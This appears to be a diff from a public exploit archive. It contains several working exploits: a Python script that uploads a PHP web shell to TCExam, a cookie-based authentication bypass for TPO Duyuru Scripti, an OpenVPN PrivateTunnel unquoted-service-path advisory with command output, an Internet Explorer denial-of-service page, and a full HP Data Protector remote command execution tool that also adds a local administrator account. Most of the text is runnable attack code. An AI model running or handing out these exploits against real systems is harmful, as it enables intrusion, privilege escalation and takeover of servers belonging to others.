An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
TCExam 10.1.007 is vulnerable; other versions may also be affected.
import sys, socket
host = 'localhost'
tc_exam = 'http://' + host + '/TCExam'
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
content = '------x\r\n'\
'Content-Disposition: form-data; name="sendfile0"\r\n'\
'\r\n'\
'shell.php\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="userfile0"; filename="shell.php"\r\n'\
'Content-Type: application/octet-stream\r\n'\
'\r\n'\
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
'------x--\r\n'\
'\r\n'
header = 'POST ' + tc_exam + '/admin/code/tce_functions_tcecode_editor.php HTTP/1.1\r\n'\
'Host: ' + host + '\r\n'\
'Proxy-Connection: keep-alive\r\n'\
'User-Agent: x\r\n'\
'Content-Length: ' + str(len(content)) + '\r\n'\
'Cache-Control: max-age=0\r\n'\
'Origin: null\r\n'\
'Content-Type: multipart/form-data; boundary=----x\r\n'\
'Accept: text/html\r\n'\
'Accept-Encoding: gzip,deflate,sdch\r\n'\
'Accept-Language: en-US,en;q=0.8\r\n'\
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
'Cookie: LastVisit=1275442604\r\n'\
'\r\n'
s.send(header + content)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in s.recv(8192):
print 'error uploading shell'
return
else: print 'shell uploaded'
s.send('GET ' + tc_exam + '/cache/shell.php HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
if http_ok not in s.recv(8192): print 'shell not found'
else: print 'shell located at ' + tc_exam + '/cache/shell.php'
upload_shell()

9
platforms/php/webapps/34077.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40519/info
TPO Duyuru Scripti is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
The following example data is available:
javascript:document.cookie = "kullanici=; path=/";

61
platforms/win32/local/34037.txt Executable file
View file

@ -0,0 +1,61 @@
?
OpenVPN Private Tunnel Core Service Unquoted Service Path Elevation Of Privilege
Vendor: OpenVPN Technologies, Inc
Product web page: http://www.openvpn.net
Affected version: 2.1.28.0 (PrivateTunnel 2.3.8)
Summary: Private Tunnel is a new approach to true Internet security creating
a Virtual Private Tunnel (VPT) or Virtual Private Network (VPN) that encrypts,
privatizes, and protects your Internet traffic.
Desc: Private Tunnel application suffers from an unquoted search path issue
impacting the Core Service 'ptservice' service for Windows deployed as part
of PrivateTunnel bundle. This could potentially allow an authorized but
non-privileged local user to execute arbitrary code with elevated privileges
on the system. A successful attempt would require the local user to be able
to insert their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with the
elevated privileges of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5192
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5192.php
07.07.2014
---
C:\Users\user>sc qc ptservice
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ptservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ptservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Private Tunnel Core Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ptservice.exe"
C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ptservice.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\Users\user>

11
platforms/windows/dos/34069.html Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/40487/info
Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage.
Successfully exploiting this issue will cause the application to stop responding, denying service to legitimate users.
Internet Explorer 6, 7, and 8 are vulnerable.
<html> <head> <title>Internet Explorer DoS Exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <body> <p style="dos:expression(alert('DoS'))">IE DoS</p> </body> </html>

168
platforms/windows/remote/34066.py Executable file
View file

@ -0,0 +1,168 @@
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.10 Remote command execution.
# Date: July 11 2014
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Exploit Author: Henoch (Chanoc) Barrera https://intrusionlabs.org
# Contacts: polunchis@intrusionlabs.org and chanoc@intrusionlabs.org
# Version: HP Data Protector manager 8.10 the last version
# Vendor web page: http://www8.hp.com/mx/es/software-solutions/software.html?compURI=1175640#.U8DhWaU_BjF
# Tested on: Windows 2003, Windows 2008 and Windows 2012 all languages
# Thanks:To GOD for giving us wisdom
# Description:
# A remote command execution is triggered when craft command is sent to the Hp Data Protector Manager to tcp port 5555.
import socket
import struct
import sys
#net user Poc l@bs.og /add
shellusr = ("\x00\x00\x01\x3c\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00"
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00"
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00"
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00"
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00"
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00"
"\x20\x00\x75\x00\x73\x00\x65\x00\x72\x00\x20\x00\x50\x00\x6f\x00"
"\x63\x00\x20\x00\x6c\x00\x40\x00\x62\x00\x73\x00\x2e\x00\x6f\x00"
"\x67\x00\x20\x00\x2f\x00\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00")
#net user local group Administrators Poc /add
shellgrp = ("\x00\x00\x01\x56\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00"
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00"
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00"
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00"
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00"
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00"
"\x20\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x67\x00\x72\x00"
"\x6f\x00\x75\x00\x70\x00\x20\x00\x41\x00\x64\x00\x6d\x00\x69\x00"
"\x6e\x00\x69\x00\x73\x00\x74\x00\x72\x00\x61\x00\x74\x00\x6f\x00"
"\x72\x00\x73\x00\x20\x00\x50\x00\x6f\x00\x63\x00\x20\x00\x2f\x00"
"\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00")
def connect_target(target, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as err:
print
"[-]Close Socket! CODE: %d MSG: %s" % (err[0], err[1])
return -1
try:
sock.connect((target, port))
except socket.error as err:
print
"[-] It cannot connect to the target! CODE: %d MSG: %s" % (err[0], err[1])
return -1
return sock
def send_recv_packet(sock, packet):
sock.sendall(packet)
res = sock.recv(4096)
return res
print """
[*] https://intrusionlabs.org
"""
print "[*] Choose a valid option"
print """
[1] Run remote commands
[2] Add Poc user to Administrators group with password l@bs.og
"""
opcion= raw_input("Choose an option i.e. 1 or 2: ")
if opcion.isdigit():
opcion = int(opcion)
if opcion == 1:
ip_remota= raw_input("IP Address: ")
port= raw_input("Port: ")
command= raw_input("command: ")
if port.isdigit():
port = int(port)
else:
print "Please provide a tcp port"
objetivo = connect_target(ip_remota, port)
if objetivo == -1: exit()
OFFSET = 46
command = command.replace("\\", "\\\\")
command_tmno = chr(OFFSET + len(command))
shell = "\x00\x00\x00" +\
command_tmno +\
"\x32\x00\x01" +\
"\x01\x01\x01" +\
"\x01\x01\x00" +\
"\x01\x00\x01" +\
"\x00\x01\x00" +\
"\x01\x01\x00" +\
"\x2028\x00" +\
"\\\x70\x65\x72" +\
"\x6c\x2e\x65\x78" +\
"\x65\x00 \x2d\x65" +\
"\x73\x79\x73\x74\x65\x6d" +\
"('%s')\x00" % command
print >> sys.stderr, "[+] Sending the payload with the command: '%s'" % command
datos = send_recv_packet(objetivo, shell) # Parse the response back
print >> sys.stderr, "[+] Output:"
while True:
# Get information about response
tmno_respuesta = objetivo.recv(4)
if not tmno_respuesta: break
n = struct.unpack(">I", tmno_respuesta)[0]
respuesta = objetivo.recv(n)
respuesta = respuesta[5:].strip()
respuesta = respuesta.replace("\n", "")
respuesta = respuesta.replace("\x00", "")
if respuesta.upper().find("*RETVAL*") != -1:
break
print respuesta
objetivo.close()
print >> sys.stderr, "print [!] Port close...\r"
elif opcion == 2:
ip_remota= raw_input("IP Address: ")
port= raw_input("\nPort: ")
if port.isdigit():
port = int(port)
else:
print "Please provide a tcp port"
print
"\n [*]Creating P0c user and try to add it to Administrators group"
#Get information about response
print "\n[*]Attempting to create Poc user and try to add it to Administrators group with password l@bs.og"
for packet in [shellusr, shellgrp]:
target = connect_target(ip_remota, port)
if target == -1: exit()
data = send_recv_packet(target, packet)
print "[*]SERVER RESPONSE: " + \
data.split("\xFF\xFE\x31\x00\x35\x00\x00\x00\x20\x00")[1].lstrip("\x07\x00\x01\x00").rstrip("$")
target.close()
else: print "Please provide a valid option i.e. 1 or 2"